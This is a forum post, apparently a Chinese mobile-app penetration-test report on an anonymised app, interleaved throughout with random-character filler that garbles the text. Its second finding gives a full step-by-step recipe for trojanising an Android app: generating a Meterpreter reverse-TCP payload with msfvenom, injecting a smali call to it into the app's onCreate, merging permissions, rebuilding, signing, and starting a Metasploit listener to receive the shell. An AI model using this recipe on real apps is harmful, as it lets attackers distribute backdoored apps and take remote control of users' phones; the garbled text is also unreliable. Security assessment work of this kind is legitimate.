% k4 G; {* e$ s8 M7 G3 }# T! i 0 P- }$ a1 W! Z& \

; F* g& ?/ ~) c3 Y5 t/ j3 b; ?8 x: a* K" ^9 S% ]   8 e( c2 L; i) {1 M4 }* W9 D7 r6 D& v# |' J4 I

& }$ y( a2 Y% ?2 K8 O/ y [ g5 M8 b3 P( K% x

, ?1 p3 `+ g4 I6 U+ u6 d; p$ e" I( v( ]# T( c1 n 2 检测结果                    ) C* d8 ]- D! j2 V+ O, Q- M1 ~# C6 Q

) Z( _ E6 Q' C# B/ g 7 Z1 ?- k# H) @2 f- `8 ~- y

5 ~& ]: ~& [& B5 G$ A+ `% e8 K% t 0 \8 i5 u" Y- Z3 p& I/ h2 m 2.1 某某某 % s9 O% s+ w! `. S3 w - `) b) t+ t3 G* P$ _" k2 Z4 p

8 V) j( i1 s F5 `- j . ^$ b5 S: m7 g4 a7 y; I T3 J2 Y

. h4 q3 J$ {2 I/ F( q+ P ! v+ d- Q: H1 y1 q _+ Z9 I' H$ ?, @ 2.1.1检测目标 * Z* F" b3 ^) w % c) @: T8 T( s- t6 E

3 t8 n% r( m* { : l& P% I$ R0 j! b( N9 |

+ d+ I& v: s3 d; V1 `# l 4 q! K2 @, s4 P2 K: ^ 目标地址: 某某某某某某APP # c& L& J3 A7 P* h: Y2 O ( A8 m0 M' F- }- z. Y: I& h

1 I$ b) f5 o0 I5 r; { ( P1 F0 O& _/ n. l2 C

8 Z; M& h; [% O+ D# m " K( K3 X& z! k6 H2 @ 2.1.2检测结果 8 R/ E$ S& u7 C+ j4 m# z+ s8 S" W; h; O% Y8 d k) g2 c: g

% {* |( _9 n4 ]: K# D " c' w9 ?8 L1 J) w% y

2 X8 `8 I# s: i' I9 K 6 Y8 a& H) n* r+ ? 2.1.2.1 1 S, z: L* X) h9 E% [) }1 y' n1 {- f

' d# Z* |1 O7 C) T1 A, P4 m7 r: q, y1 u! W& A

; X7 E& _/ o8 e5 \; H 7 L/ F7 t3 V6 v3 ` 漏洞链接地址:某某某某某某APP 1 M) _( [+ J# H0 A. X* I4 o. T# D9 j0 G5 O4 e8 E

; a' {4 R% x4 L* v* U: b' l [5 Q' L3 t1 S) O

; h* [4 A7 k5 [: `9 f" G3 `' W, G# Z) x# k! d* `   3 w( L+ g4 n' L3 [( q+ q 1 K8 G! ]6 y; O; e, J: y0 z

( |* Q, D0 Y5 l1 H ) |7 Y/ X3 k9 r' ]* w

+ M- F$ Q3 H" W( p/ G ! |8 v/ x D+ c 漏洞分析及取证: ! h9 d+ z; `( [' ^7 { p) Z $ a4 a3 ?0 t4 A( V' ~% [

; i% c, `& l |- B9 b ! `# [! p( x$ U0 C& q

" c' [: ?- t6 l/ }2 q- O7 }( C) }4 y# z, B9 h1 R" G                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: $ x3 q' @! `) ?+ t4 b / b) V* s2 q2 u u8 {+ d: z/ h/ r

9 }: m& n3 k% c # m6 k; e. K# n* q0 ~- x) Y

; q# }1 @! p6 @5 a7 T+ L) [7 ]3 D& J' b5 }      # ^2 K: o; } {/ }9 R( c: ~) @3 s " P2 g' U( e2 U8 t3 d

- j2 S) E- b# x ) T% L6 x( ?* u$ ]

+ d7 J! S* F4 r' m % w2 ?! I) A8 l9 J) Z                       ( ~9 Z1 M2 [% K4 S: b $ @# }5 F9 y6 v0 O9 Q

; M4 |, P% g2 x4 C + Y b7 R/ R2 @5 v$ X

5 X) y! G3 H) n& l5 l) g' \ 6 v, x6 a6 p* X6 J% [% W. b 3 W2 y% ^) s6 V: Y 6 ?. f- @) z) Z6 w" _% f) u

# }2 O4 G/ T. o$ T0 h1 h 3 Q8 V9 @( q9 q8 V+ z( n

6 S* r1 l% m- O2 D) q# z ) U9 n: }+ Q7 x) G" i 4 ~' }! c) X4 U& G" P/ w! k/ Y- {5 |$ @

9 |8 J+ \7 A6 U3 B 6 ?( I& R' }3 @- e1 B( H- g

8 l/ v$ o/ V$ O0 d: E' }/ O: n5 v1 |- \; s( h z 7 l' U2 R- f4 r / G. s! f/ L3 o Q" M

0 {$ v/ @0 C* O2 j% L9 A; ] 2 a4 T/ {) N" N1 Z. n! Q2 A

( o) {' y( b! ]1 ~ . ^" }6 e2 S3 a- v6 E0 x- W 漏洞危害:高 + J* k) w, q9 X; t2 ?: z+ s$ ]+ i6 _ m+ y# A

$ b4 H) T6 u( U- a9 b9 L8 h . w/ [/ |4 H# l+ l
. h4 A+ ]8 R8 y' O2 h " c" D/ z7 J6 V- L" p# X 3 D1 [- f. K$ W) B, s, Y7 @' T! ?8 e) |1 E2 D+ a# K c( s6 T( w$ U& k! V _/ d' H6 d' }$ Y$ p0 Y3 {) e3 O& E3 ]; ^, o2 V' A. H' Q7 A: P' p, ]$ n& w! H6 C' ?0 c2 @( W9 i+ I) D6 {/ r$ y4 c* J9 ]1 j3 ]% H2 B' I3 v! S- e$ L6 a$ ?2 _1 S+ G2 a4 r3 j( n; r% U9 z7 I c* s' x- D9 t! J& w4 I% ~. D$ ]+ p9 D* j; W% B, N1 h0 t" m5 u6 P' m" g6 r& B2 } R4 I1 n( k) J0 D% a6 I# p( C; N3 a" U% ?5 O! \- q3 t1 d/ y' r6 P( {" B6 Q) K: M6 k* g! W2 B' M* D. y( |; I; U. k& M6 X: Z$ }6 i B6 p* F2 H5 F5 A! ~* C0 u4 q5 D" ^- y% a( U- Z2 V; |$ M/ c5 u" L1 ]
9 b8 h4 q& f( P4 o0 j: K / V+ Q5 {# _+ f5 n& d

. g; A5 _( l0 ?3 } ; b% {, T$ E: Q( u X3 M" H/ z4 R( Y& I 严重程度 * `7 q' l/ v, F x+ o& t A' Q! t2 j/ P

2 z! S) t6 u/ I3 I, p# _. Z, h0 }; I2 Y* t 		" H% a% L! g/ i 6 W0 L" v" o0 Z, n+ r* r( S0 m

3 C# A9 z/ Z/ O1 F$ I$ ~2 b+ T% c) h/ m7 x* G1 K; M% q! `* D i: N& Y5 o4 x2 a6 i [5 o * U: G+ g6 S! t* `! T0 u- t

' ~, q1 h. i% C; U4 u, p0 R7 B 2 D- R }* ^% C9 z6 |3 w; r% v 		+ K' D5 Q4 ]( J+ R) g9 x 5 L/ d# G' u7 z

" U5 t$ c a8 a4 ~( C; f / @) Y) |9 A6 l' P% b: k ; h2 R% m5 c1 K + Y. i' v# |+ f5 |

' S/ k: U( C# y9 k$ e: T [* S: |% {, z" X. N 		6 D' e# A6 ^4 t$ X" E+ r 0 r1 E3 v) F1 O4 t! B9 u

3 C2 k$ l% {7 W 3 ]( v0 f* f) p3 [ ' Y3 s$ s) ]- t# Y" l " s, e7 I0 O; q

* p- ^* y# @: b& l5 W9 | ( e9 E, m. N1 s9 x; K; T; y 		0 Q y- m( o2 u9 ]4 j6 Q! V/ ~2 A/ h/ `: g! @$ R% J- I0 Z

' g+ T+ N8 K: ~5 w/ w# ]7 c- I( j; z$ ~6 X* q   - {) g) y2 s" E8 b1 | 8 j* l: z1 S( `( u: h) S+ W- s

F8 i! \6 r4 [7 O: s8 f' ]" G ( H% b( m4 |) w* r+ S9 J( w 		0 j. O) ^$ E9 }! [6 S6 T: d 9 }; q. k W1 @( F* O

. ?5 D5 w( A1 i9 v1 M* A 3 f$ T; @9 o, B, M9 O% A3 X5 } 3 S" l: p( a! D$ e; |) U: A ! r. ~+ V# Q7 k7 p7 C' S

% v3 }$ L4 E8 W5 w : B( \6 h D& |5 u D 		5 d. Z# B3 C% v8 y- P . y" ]7 H6 j8 |3 R) ]* P

+ i G, e$ N- P+ C, b; n$ V0 j1 `) P. ~3 s/ Y ^' I. [; N4 U   ; v: z3 [& |( q3 K/ \4 ] 5 y+ b! s& ?3 \1 d4 C6 ]

! W |2 f( S7 n& R# Z7 p( R Y7 {* x5 V% `8 D+ F- }2 q
7 [+ n* U" r, H" i$ \2 z1 {3 C7 X e: T9 F
6 }7 @7 Y5 E/ E + @4 g+ ]" y; ~$ O4 R

2 h4 M0 X5 ~! ^5 z; j* c' W% t% G - }8 R0 c+ g, i! a   ) `9 j& ^- I! \0 v& m6 V% t 7 L& J/ C5 m% x. A1 e

0 n, \ N7 W) } J5 q, W! Z3 w) v: F$ n. Z

! h3 ~+ k* P( |% _& m& x' t ' U7 p$ I7 n+ z* G 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : S5 J6 r4 | O- B% C5 ] 4 j3 X1 F# z# S

/ e2 Q. k% h% k- x& c . U/ ?. d0 X+ |/ R8 d* M8 Y( A8 Q

& J6 t7 b0 X4 M% R6 p) M ' ]- {( f& y8 h' J! M           / E8 J. w( Q; w3 s: N ) x) v* P# e6 o _+ N

6 G9 S' b. x+ E# j2 \; f) G " Q( k1 d2 i0 @9 D, M8 D

6 ?& b' L5 R- u+ y ! O' ], E0 y$ N5 A4 c. M5 Y   2 f, O% {# D% C 3 d6 a3 _0 u* E' K! ?

, r: ~% B; r. j9 s$ m P+ k! i6 r1 [- i

% E6 b _6 s3 O9 l . `* l* }9 T& p7 H7 _ 2.1.2.2 # f; ?9 W! q. e# H; g0 ? - y7 g; P( A+ A, y' X8 F5 ]- \$ m

2 L/ n/ U2 k6 y8 G0 {% E3 K7 b" G6 Z W8 ^+ w, `4 U [

8 _$ }% s: N) E: T6 I: k # m. E3 r/ Z2 `. g* X- m 漏洞链接地址:某某某某某某APP ' J' k6 ^' _4 U7 b7 H+ |- b' c4 ^' Y+ x6 T

9 V& B. e9 E) w8 o: L( ] ! u) F: f8 ~ ^2 |

0 x: U" G1 L4 h) }( ~+ n* ^) h & z- u. |3 E4 C- X3 v1 I( x3 j5 k 漏洞分析及取证: 8 e; \$ e6 o' ~ m9 ~- K" I ( h( g% c! E5 d- m4 [

" i# T* a+ J; ]# u. ^/ R ) A" }0 o; {% ^& [

t" K& A, O0 x8 H7 {# A J" }% H: e2 e8 m                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: & J U5 ~4 K) a% Y+ a6 Z# w9 S% |# a ! q3 j: `4 o6 L2 k; K

& C2 J% v' O% M+ t) M , G) M$ S* V {+ u ~: {6 W1 ` s) R. ?7 _

+ h( e; j6 V% o ! o- E9 H3 h: ?/ J5 H Metasploit 生成木马 apk + S+ q4 C. `3 O e8 }/ v/ S/ L; i- ]3 K0 P8 c

$ v( ?' |( e P) h7 d+ J , ]/ W0 z% _& @2 T% \/ F

& w0 v5 p* J0 U3 c2 D1 \# Y" H" b0 S msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk - A) U9 c* P1 y9 o, Z! x . s2 w4 ~1 C. l# m& T3 i, j

: [# F7 x' ?& x1 j- b8 D# P. S ' x' @1 c C* J' Z s/ ]6 p& A

/ y# E" z+ i0 f. l4 p # P7 v& ^! ~* i1 | 反编译目标apk和木马apk ( ^: O5 t6 b( L2 ?& V1 v + r4 Z" M; ^3 l4 M4 N

; r: ]" S% T! q* g2 \8 n) }$ C - {; T# Y6 N6 U# ~

6 O6 r! v8 f7 q5 a' h 5 m) q2 w+ ?: T8 j/ E6 R) _ apktool d target.apk
8 Y A0 Y5 [5 l/ u. ? 1 ^) M$ m$ s R8 u9 _2 w apktool d cockhorse.apk - |2 S: T/ t# a0 L , j3 J* L7 f" H+ m

4 a3 i, i, K9 I- V# } 2 s% i2 e9 b$ T# N. X A

5 W0 [% M, Y; Q3 J* F- E* d ' f" Q& l; D& e" F% Y* @( B8 D 木马 apk 注入目标 apk 0 B" L# e0 J* |% x5 R* G" k) y/ ~% U$ o% t) h" R

( P5 M, ~* E6 D- w. u. }! I5 N$ d- {/ P3 @3 K+ `

. V6 C* ^$ t5 T6 P& a / g6 I0 L6 b8 I1 t B; [7 y/ e2 S/ | 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 C2 k2 V u: `" x' M 7 j5 U8 x+ M4 g6 d* |3 i8 B2 Q invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 4 T& O2 s' Z+ M/ \# G/ i% z* ^' l3 m( Z |9 ]( n1 Q' _

1 [0 r) E3 t5 ]1 V0 E4 e : d3 E( D, j1 v# f/ B, J

6 b+ K4 e( S3 I% B) ^4 g5 y: R 9 R8 ]' o0 J) n) Q" q$ ]* a 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 G" w* b& F4 U ! A, g* M" w4 o* e" |6 l+ v2 ~

( {. J2 ]) E K: x6 q6 \1 T * [2 `3 ?4 u; s* q3 K: U

; M, [# G( D9 K6 e8 `0 k; M1 v' j/ K7 z7 H 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 8 s" |' B) D. }8 e' D: D0 | 7 B" N8 L. }, |& z: j+ e4 B

4 h2 v& _ @6 Q, S( F3 h/ @1 _3 ^6 V1 _& O1 r

% }* L7 j9 R' e2 A& S3 J) P 6 z& B7 u" ~7 W" V 回编译生成最终 apk . r1 A" ^& q7 |( _' }: o! {1 m 6 o) O4 }5 n3 x; i8 z. e

+ W/ e* @& c( a0 I; j+ @( H 9 h( q M4 Z2 {+ t& z- j. T# V2 q

, m4 ?5 _+ }. f5 t9 F9 [4 T$ r% W o$ \& M. ]) ^7 h 重新打包 7 {. w+ H# a; r4 I 7 A9 m2 p, _/ ]$ ~

) A+ [5 x( a) L8 {1 P & F* T. u% A! H3 E0 {# {% k% W. y; ~/ L4 ~

?9 F! r" ], q2 e: R5 {: i' s4 ]3 c% V, Y1 l* ?' Q apktool b -o repackage.apk target_app_floder : A( t5 _- x6 v7 E $ ^6 f! |$ T4 |+ y

" u5 F+ x+ L! Y5 v& b% a2 I" m7 k) D5 a$ O/ q8 c( t

; U6 V8 ^9 \5 y& x$ d2 {, Z1 M5 r' f, z8 G2 ?+ Z 创建签名文件,有的话可忽略此步骤 % r% [* y. [) R! K9 l$ G t: O& H# z( B

( Y" N! t8 ~6 `7 j$ ] / w: [" y4 E4 Y# K+ b

( E8 A. k! A! @3 ^% f 0 O/ v+ ?# _, B$ |* v( Y; s6 e8 t- Z keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                7 n/ ]3 T5 a; v4 |- a/ N' \+ R% U / q8 ?. l8 G6 ^" C* e$ V

$ r7 n! h+ i6 _; }* n' ^, l- R0 F3 q/ y! T" h9 C3 p

5 a( D1 }( D1 j1 d$ H* k6 x+ q& S. D, X+ d7 {; H; U 签名,以下任选其一 + d4 b4 u' `7 W ) S, n. V. E3 ^* |5 u

' P* n7 U- B5 `- |/ K# C; [* ~- {7 D% d8 }! O" ?

3 z; `4 x- D) i b) K& F; L" q6 Y5 c b5 L! A, v; i jarsigner 方式 9 P8 q$ @6 v! P2 G, X8 D2 T! `$ H

o+ D) m7 Z( n5 ~$ m9 O" ^: A5 K2 P! F9 K

; y) B$ ` C- ^ / G& y0 u3 M+ F9 H1 ~+ u jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname % T4 i( N; a6 V% O2 {1 ^0 b 6 ~/ b% t# N& A# s0 ?, s( B

8 y- e; P1 r0 y2 q. w4 W * @$ d. h* F. l9 Z Q2 }, x( i* e1 K

2 _" u- x+ V' `5 B# w e+ M $ V4 V G1 k" f6 K) T, W6 y apksigner 方式 + n+ c# @7 K4 b! z! W* Y 3 t7 H( _* ^, S( j9 A6 O9 u F

& u h) q, L! \ + Z. Y, W) X$ m9 {- o

! i n; l/ V, D- Q8 t' ? ^+ f6 N& O( A apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 o8 @& N% |1 V, c/ p/ M ; I+ h n; N6 P2 N. E+ e. O) M

, z/ l( G0 }5 u! A5 ~- v 4 g4 y& q7 ]; v/ `# i7 M3 W8 D

% c9 @7 H/ M* K2 S5 o8 U6 ?% C. q& v 如需要禁用 v2签名 添加选项--v2-signing-enabled false ; U- l% K0 Q! g. N ' M# p4 ]- j- a

, c _7 V. E1 |' a5 j/ ]( r 5 e( ~ s( S0 J o% g

$ v0 c; z& X* t 3 `& J; v. F- ~0 p0 J- g# O 验证,以下任选其一 # }# O8 ~$ P: b. Z8 R0 d 1 b3 k; ~0 a" ] m( q R

T" Y; D8 W, {) E* A Q2 g# }3 y9 w: Z2 j7 d

' o. S! K9 E# Q1 ]$ H: p( A! F 4 v! s# x8 U7 m2 j, f9 d jarsigner方式 1 s6 B6 y1 |; Y( U a% d7 x9 @6 T' a; O' B% I" \

u" v: J+ T: c% s $ A2 j5 h, V- ?

+ Z) g7 T: f9 c0 e- M# ?* [( k 1 U+ W5 G. H( c. [7 z; ? jarsigner -verify repackaged.apk % D" J; q( r: D x7 I. G! r- N' Q; Z$ X' o' R3 N# L

( L6 O: |: k3 I' J" ?7 _3 W4 T - I$ B" l# ?1 J z3 v5 X

: L% Q/ ]% }% d. R 2 i' [. K7 H5 X7 E4 X apksigner 方式 * E4 o8 m' R, f! Y % ?+ @$ C4 h- m

4 W! E! @& _, n, M g8 D * a0 [+ N( M9 e+ x! O

3 T" V9 u7 c% P4 o 6 a2 z# l* H/ `! r0 r! U9 U apksigner verify -v --print-certs repackaged.apk 0 B7 ^4 B$ G. Z5 ]4 y$ a' P2 @ % R" N- p2 [ T8 C

; F; Z# ~3 I, d, E" X8 a % I1 l8 L* G, @

- ]. s; s1 x* T0 I$ w A( e+ J& ` keytool方式 . z6 O0 S" z4 |' C! k) H% V+ i 8 b" n* ~3 L3 k) H+ {

) H# T4 S1 s: k0 l ; A' B; t! C1 B- b7 _ j

2 r) X7 ?. f t2 l. K. ~ + m2 J" s9 k4 Y* d keytool -printcert -jarfile repackaged.apk - t) W7 v J/ Z 0 K$ Z: k& p. S

' B0 H# F8 J) k2 E 2 ~7 M& l7 `: X+ K) [

. j; V; K" W3 e( U- w2 e% V # ~: o& W4 i" {7 a) v4 A( @: ~ 对齐 * @+ L" Y$ t: H D$ L " i/ C& u8 r) T- v6 r

- j+ d# w4 v+ p% }* }7 ? 2 l. M$ S7 M, d' u

0 {1 M, w+ K# h# W. K' K0 S / P [& U* Y- c& }* }, ] 字节对齐优化 3 Z; T5 _6 L7 d/ d5 R 9 f3 U, d: X, X# W+ J0 p: j' }

- o" J1 m; N x# Y5 C, Z + L% M( Y' p; F

) \3 D& G7 M+ {" l 4 |# S2 K$ ^; x" |4 m0 r zipalign -v 4 repackaged.apk final.apk 7 V2 S/ q) a! ^3 f " e* n. ~& K l \) l" V

9 B( p5 }! U, H7 {0 x0 Z) o) x, c- o/ [7 n2 L; \8 J

1 Y% S8 ` t/ m- c8 ^; ]5 n% F" c! V7 m4 j1 C 检查是否对齐 8 l5 L! a1 g6 y1 b( T* L, L3 z# Z7 h . D5 \7 {/ h' }9 d: C3 S

3 T! E+ a$ } c# |7 D v- ^4 M ; {( e% f H; e- [

+ X* n# Y8 y0 M0 d & `5 E+ K j/ b zipalign -c -v 4 final.apk : @% z. `% ~& S- A1 O4 e! U/ B9 ]# n) m8 f9 G+ I) }9 W

U1 J& }9 z! d / i3 N, C/ o" b5 w% G3 p" {' G8 Y

/ v0 b/ R( G5 o0 i: a) k 9 i# R+ X$ @0 B# r' N! b 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 1 F7 c! `$ A2 z& `3 d6 U2 R % ]0 x1 a' W) V, a

$ f0 ^7 }3 S4 L- y + T t% q: v9 b" E& e

- T" u' h- K! O! L8 M: H% p p; L; P1 v0 _1 V1 x( | 启动Metasploit控制台,配置参数等待上线 - u8 w* S: l6 H5 g 3 q" Q X" s6 R4 F" X: T" F! K

7 D3 C. ]' z) V8 I9 P( G , J; G2 [; u% P1 @8 D% o$ }

3 `! N `& }$ Z v . O D6 N# g4 S$ \ 在终端依次输入如下命令 4 g) x2 F" G# {' @ * [8 c% [) [1 ]

5 W U" H/ Z3 I) Z- [ 4 X7 ~2 `' U/ F$ m6 M

+ \- [' S' T% X; ]" s) `1 |" V - [0 h# T2 C$ ]- b0 g! I# g7 D/ R msfconsole $ N( p. T# E, O/ p; j; D* W3 P5 j; \5 O) B% g+ Z

1 ] D. L3 H, g. R9 D! I! E7 ~ " |; ?, n: T* V) t$ h* i

x. V" X6 n5 Z& `- [. I8 }) b/ I! p use exploit/multi/handler * w+ Z. K- {( t2 P1 { " O: M, ~$ P1 Y( Y" k% ~

- h8 E. K% T- O' {( ~ # e6 U2 m6 w W5 I

" G6 D+ C* ]7 t Z - w, i! \5 p1 e. U0 }1 @ set PAYLOAD android/meterpreter/reverse_tcp / U& o$ c1 M# ~9 O2 l $ F8 d) w6 {$ p( i2 ^

; u2 v7 F# |/ T# V4 h$ C ? % x. B* I( D! z# S8 }4 i8 l

7 M, i2 E9 c3 k+ x% H 7 c9 ^& e T% u! Q, v set LHOST 192.xxx.xx.xx , A6 G% a: L: C; [! |/ p 3 S0 J; [9 F) w5 ]; ?6 w

9 W2 K0 A- h! M+ T/ V + A" y, ^4 W; o! w. w3 d

1 e8 v6 X T; V ) q/ v4 r4 s3 S& N" V$ Y1 B, Q6 M set LPORT 4444 % q) W+ n* Q0 Z8 `- }6 R2 H3 \4 G; P% Q; g/ I7 K2 R

" x8 L( x/ c- S( f [' Z& r7 k' ~; Q( M7 s

- e" \) z. t, }* h) V3 t0 w+ R; g9 \- ?& z* k" X( \ exploit ! ~4 ^! l `- P9 Z 2 g- Q# g0 Z, r& ~

! F, j9 x# Z7 R) `. n * w% f9 D2 D/ w2 m

2 T7 H7 p9 P1 e& M) ~* P' `& k: a# G3 } W/ Q& u 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               9 r& o2 p% m' [7 K. s 3 b# z- K4 c; I. E

- ^, x+ r- a$ l 4 Q6 Y! r1 E6 N6 p8 N

2 z! F, ?5 R$ ~9 E% g# P5 j @, {+ |1 z 9 m$ A3 Y& i9 S 漏洞危害:中 ) r- c5 v# Z$ h2 C& D% e % x9 u0 C9 ]$ V5 o4 q; a# t7 s

6 C/ H7 x+ h# T. g( @* s) q3 o- H9 ?" G2 [- h
" v$ n* e/ s/ Z# r: p" \) P9 V ) O% ~2 I( x1 T" b # ?6 d' c( @( P: g : e# r$ j8 l5 N3 r6 n 1 J3 _" q- i; U2 [ |% m4 f( x6 ~3 V f* ]" a" _ t: A+ Q& {6 b1 G8 J: ]1 }5 m- c& \! V5 R/ ], z h, y; ~2 C, n+ |! @* { J0 w1 M) z' U' T/ R7 `6 g5 ^- B4 ?; |! y% `" O, e" \ ~# F5 g, }. T8 F, f c: i# s& O) S( D/ F0 y7 [ b$ c2 Q. ^6 T4 x7 }& m Q( Z2 \2 j3 y$ z) _% R r5 ` k. d8 B/ L2 F8 x! J, I) f7 w$ s% u: v8 s0 F/ s- a8 y$ X% l* H7 ]% O) q) C. o- D9 r+ k. T9 i! X3 K* I# P1 q. R5 \5 k/ u( B9 Q; ]8 b' Q0 ], P4 N4 G) h! q1 D1 ]) W8 M3 c- N: i: S1 T/ A' n7 X# y' n6 Z1 l" G+ @6 l8 M- I4 f- y7 E% h9 O9 z/ |/ S$ C/ J- l ^& l( I- b9 R# |
4 @" f* }* @0 ] " p7 d7 M* `6 T! d( b5 g, j

% O) r2 E$ s; \# j. V6 }7 o4 C1 N& u4 i) N- Y 严重程度 / K/ W, n" \: L7 ^/ w: C/ Q, W+ p& v3 Y

6 _' _$ v7 B3 g: z% B6 [9 @5 c& A- M3 l9 b8 X' b 		% M7 b) d' }; z, g2 n# ~# f: q8 z 4 j' I) L+ `9 _4 P: z5 X

( M7 S4 a8 J2 e$ x% e R* k0 R, V2 ]4 V- p1 N- Z! c 7 a$ _: C4 v5 s) p; g! @# _ 1 U& {7 G6 r0 }% K% K

% t u4 C+ O! u 4 {# ~3 J. b3 t1 _5 l9 n' N 		: e1 z( D/ F. e* A) q$ H2 @% v5 K8 l" u9 `$ \

* |( l- A5 b: o 4 C7 V! W' ~6 e5 q) b/ L 2 X F7 w$ t" {6 q- t: z }1 v% |0 S0 q

6 x3 f, I) H' T 2 M. d9 R! I( n3 X& t 		" J9 n( V$ r/ x) w/ A ! z' ~% m; y& ?4 |4 Z

# d2 g/ c; T+ T+ @; a3 @ ; |. [) w( G' w7 I# D# q 8 w* `" B7 S$ z. X, c - I2 B- J7 ^3 {' ?$ W

; n" q) U( M- _- r+ F & |( ]5 I' j: `( F1 s6 I5 m8 P% U 		; H! c( g& l& z0 f, p# X. R) ~ ( Y( ^: h( R1 t% q0 A. C : q9 U7 f* t; p 0 n9 o+ V. N8 b! | ^" \

9 S' E* K0 S* b! r) G % J1 r$ S% A3 x# z   / V" h3 }" l6 }! A# H. V 8 z3 ^5 }2 I0 M7 }& a" S

& ?* b* V: w' N- j7 g9 a L7 q! n" ^% m& _. H! h S 		& q( Z0 z6 N% A( V0 {0 f( } v# M4 s6 i. _, O

! F. V+ [+ u- W3 K$ [# W+ G8 V5 ^ 4 f& T" i" ]3 P# K 1 D5 V4 y3 \' e; ^5 M, W2 U" X 8 J7 V* l" `" _, S$ C+ G

( b2 J2 o! p N0 X o/ z . P+ Q+ H( q; w9 ^+ _. _ 		& k$ e( }6 d" D3 K ( |5 o6 b! I% P5 q; h! i ; u V4 X, t! ^2 F V+ E2 `4 ^5 J, @; ^5 p# z2 u# K7 b! x- C

2 y9 u$ V9 e* B% Y! Y5 R5 W# T 6 c+ `: k5 M7 {# }. d, V i   , N" x7 `* C4 T8 O! i* S# H F* p$ E0 x( Q) J0 u

0 G: y7 \0 ~, W% Z2 N6 T 0 l+ Q1 i ~6 H8 o
- E/ K. h+ M4 n2 r( p ' l/ ^# a" T. t$ {" ~; E; k
7 g$ g# Z; P9 G$ j4 T * S% @* z, V U* }

) B& s' \5 `7 U! K 2 v, e$ ?) }/ _; u2 f   2 T$ u! n" S- ]9 t5 ^, \: k2 `+ c* z7 `

& k7 E0 r0 [& u5 G5 ]$ E 8 p+ C4 i$ w8 p! g; J7 }) j

- \4 ^9 L3 i7 o! }+ y1 m g: B( Y2 V& H% R* {/ q 修复方法: , M* y4 p+ S0 a/ C3 M- g, J 5 Q9 H; H! m/ _$ a4 H+ J

8 q' w1 C1 Z2 Q" J 0 d# |: S {: }: N; G* L

* i7 W" y# V7 k2 |8 j! ^ @ , w% p0 B3 v* ~8 y: h! r" e               1. APP 启动时应做签名校验防止二次打包。
( t7 h# k% a! }. y- { 8 f4 z. n( E8 X8 z8 I- ^( K- A 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , l3 B& s% H4 ^+ @3 E ( D6 x7 |' F' Q2 b

. B0 w# Y4 U4 I, y: a0 B5 f! S) R6 Z5 E( K# K6 K* f( ] : X- N8 ?( d- F* M/ q( S . j$ y$ E4 Y% w R6 _2 q w# t- h

! U3 Y: m: c2 ^% N, b! f1 w4 U- Q2 u& m0 x+ L; H6 w! ]   & d# S9 Z3 V* B6 Y & i$ {7 l8 Z1 s& n

! j& d" l, U8 e! F3 u U3 E; W/ G Y1 B8 X 7 {; k# t/ R2 ^9 w $ u4 c' d" t7 @" h

: |0 \0 Q4 c& r/ n * f4 G) a+ V9 e5 e/ U
& `' F5 z9 F. n+ m8 t# ~; b ; }6 R3 ~0 S8 U. G! ~

* Q5 d6 R3 m _9 q" W3 M' Q. s: \ , p8 w/ P! K% ]# E
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表